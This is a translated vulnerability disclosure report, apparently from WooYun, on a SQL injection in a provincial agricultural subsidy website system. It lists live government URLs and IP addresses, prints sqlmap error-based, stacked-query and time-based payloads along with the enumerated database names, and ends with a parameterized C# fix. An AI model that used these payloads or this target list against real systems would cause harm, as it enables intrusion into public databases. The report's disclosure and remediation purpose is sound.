Generic SQL injection in a certain website-building system

Vulnerability details

Disclosure status:

2014-01-06: Details notified to the vendor, awaiting vendor handling
2014-01-11: Vendor has confirmed; details disclosed to the vendor only
2014-01-14: Details opened to third-party security partners
2014-01-21: Details disclosed to core whitehats and experts in related fields
2014-01-31: Details disclosed to regular whitehats
2014-02-20: Details disclosed to intern whitehats
2014-04-06: Details disclosed to the public

Brief description:

Following http://wooyun.org/bugs/wooyun-2014-047782 (POST SQL injection in the Yunnan Province Agricultural Machinery Purchase Subsidy Information Management System), further testing found that many provinces nationwide use the same website system, and penetration testing found the same SQL injection in each of them. A random Google search collected the following:

http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx (Jiangsu Province)
http://116.52.13.46//ynnj2012/Application/QiYeTuiJjxs.aspx (Yunnan Province)
http://amic.jxagri.gov.cn/nybgj2013/Application/QiYeTuiJjxs.aspx (Jiangxi Province)
http://nj2013.qgny.net/Application/QiYeTuiJjxs.aspx (Hubei Province)
http://www.shac-nj.com:90/njbt/Application/QiYeTuiJjxs.aspx (Shanghai)

These are only some of the URLs; some of these sites have, of course, already patched the vulnerability.

Detailed description:

Verification against http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx (Jiangsu Province):

Place: POST

Parameter: TextBox1

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 9682=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9682=9682) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __VIEWSTATE=/wEPDwUKLTExMzcyNTQ1MQ9kFgICAw9kFgoCAw8PZBYCHgVzdHlsZQUOZGlzcGxheTpibG9jaztkAgYPD2QWAh8ABQ1kaXNwbGF5Om5vbmU7ZAIJDw9kFgIfAAUNZGlzcGxheTpub25lO2QCDw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWQWAmYPZBYGAgEPZBYOZg8PFgIeBFRleHQFBiZuYnNwO2RkAgEPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHwMFBiZuYnNwO2RkAgMPDxYCHwMFBiZuYnNwO2RkAgQPDxYCHwMFBiZuYnNwO2RkAgUPDxYCHwMFBiZuYnNwO2RkAgYPDxYCHwMFBiZuYnNwO2RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwRoZBYCZg9kFgICAQ8WAh8EaBYOAgEPDxYCHgdFbmFibGVkaGRkAgMPDxYCHwVoZGQCBQ8PFgIfAwUBMWRkAgcPDxYCHwMFATFkZAIJDw8WAh8FaGRkAgsPDxYCHwVoZGQCDQ8PFgIfAwUBMWRkAhEPDxYCHwRnZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFBHNjcXkFBGZkbWMFBGpqeGgFDnFpeWV0dWlqanhzX2d2DzwrAAoBCAIBZPcDkg/8N/dI0q2fmX4/To3Gbnlo&scqy=on&TextBox1=%%'; WAITFOR DELAY '0:0:5'--&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' WAITFOR DELAY '0:0:5'--&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

available databases [9]:

[*] master
[*] model
[*] msdb
[*] njbt2012
[*] njbt2012_0225
[*] njbt2013test
[*] njgzbt
[*] njgzbt2013
[*] tempdb

=======================================================================

Verification against http://116.52.13.46//ynnj2012/Application/QiYeTuiJjxs.aspx (Yunnan Province):

Place: POST

Parameter: TextBox1

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 8732=8732 AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4801=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4801=4801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(105)+CHAR(113)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)

Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4052=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=

available databases [12]:

[*] 13bt
[*] master
[*] model
[*] msdb
[*] njbt2012
[*] njgzbt
[*] njgzbt2013
[*] njgzbt2013test
[*] ReportServer
[*] ReportServerTempDB
[*] sheng_2009
[*] tempdb

Proof of vulnerability:

Same as above.

Although only two provinces were verified this time, most provinces nationwide use this web system.

I hope the developer takes seriously the leakage of important information and the more severe harm this injection can cause.

Below are the management systems collected from some of the provinces:

nongj.shac.gov.cn/dwhnjsy.asp
mulu.tjnj.gov.cn/dwhnjsy.asp
220.171.42.161/xjnj/dwhnjsy.asp
218.12.43.242/dwhnjsy.asp
116.52.13.46/dwhnjsy.asp
nj.qgny.net/dwhnjsy.asp
Fix:

Modify the code.
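What "modify the code" amounts to for a form like this one, as an added example that is not the vendor's code: a reconstruction of the string-concatenated LIKE query that the report's `%%' ... AND '%'='` payloads imply, beside a parameterized ADO.NET rewrite. Only the field names TextBox1 and btnChaXun come from the report's POST body; the table, column, connection-string and GridView names, and the WebForms designer-generated fields, are assumptions.

```csharp
// Added illustration, not the vendor's code. Only the POST field names (TextBox1,
// btnChaXun) come from the report; the table, column, connection-string and GridView
// names below are placeholders.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class QiYeTuiJjxs : Page
{
    // Placeholder: the application's connection string, read from web.config.
    private static string ConnectionString()
    {
        return ConfigurationManager.ConnectionStrings["njbt"].ConnectionString;
    }

    // BEFORE (reconstructed vulnerable pattern): the search box value is pasted into a
    // LIKE clause. The report's payloads open with  %'  and end with  AND '%'=' , which
    // is exactly what is needed to close  LIKE '%...%'  and keep the statement balanced,
    // so anything containing a quote becomes part of the SQL text.
    private static DataTable SearchUnsafe(string term)
    {
        string sql = "SELECT qymc, cpmc FROM qiye_tuijian WHERE qymc LIKE '%" + term + "%'";
        using (var conn = new SqlConnection(ConnectionString()))
        using (var cmd = new SqlCommand(sql, conn))
        {
            return Load(cmd);
        }
    }

    // AFTER: the term is bound as a typed parameter. SQL Server receives it as data and
    // never as statement text, so quotes, semicolons (stacked queries) and WAITFOR are
    // inert. LIKE wildcards typed by the user are bracket-escaped so they match literally
    // ("[" must be escaped first so the brackets added afterwards stay intact).
    private static DataTable SearchSafe(string term)
    {
        const string sql = "SELECT qymc, cpmc FROM qiye_tuijian WHERE qymc LIKE @pattern";
        string escaped = term.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        using (var conn = new SqlConnection(ConnectionString()))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
            return Load(cmd);
        }
    }

    // Shared execution helper: opens the command's connection and materialises the rows.
    private static DataTable Load(SqlCommand cmd)
    {
        var table = new DataTable();
        cmd.Connection.Open();
        using (SqlDataReader reader = cmd.ExecuteReader())
        {
            table.Load(reader);
        }
        return table;
    }

    // Query-button handler (btnChaXun is the button name in the report's POST body).
    // TextBox1 and resultsGrid are assumed to be designer-generated controls; resultsGrid
    // is a placeholder GridView name.
    protected void btnChaXun_Click(object sender, EventArgs e)
    {
        resultsGrid.DataSource = SearchSafe(TextBox1.Text.Trim());
        resultsGrid.DataBind();
    }
}
```

Two further points that the sqlmap output above supports: the enumerated database lists include master, msdb, ReportServer and several unrelated njbt/njgzbt databases, so the login the application connects with can see far more than it needs and should be restricted to its own database with the minimum rights the page requires; and the POST body carries an extra field named sqlvlaue, so if any server-side code builds a query from that field, it needs the same parameterization as TextBox1.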

Copyright notice: please credit the source when reposting 【|→上善若水】@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed at: 2014-01-11 17:36

Vendor reply:

CNVD has confirmed and reproduced the described situation on instances in 2 provinces, and the matter has been forwarded by CNVD directly to the software vendor. If subsequent whitehat testing finds other instances, they may be submitted again.

Latest status:

None yet


Vulnerability rating: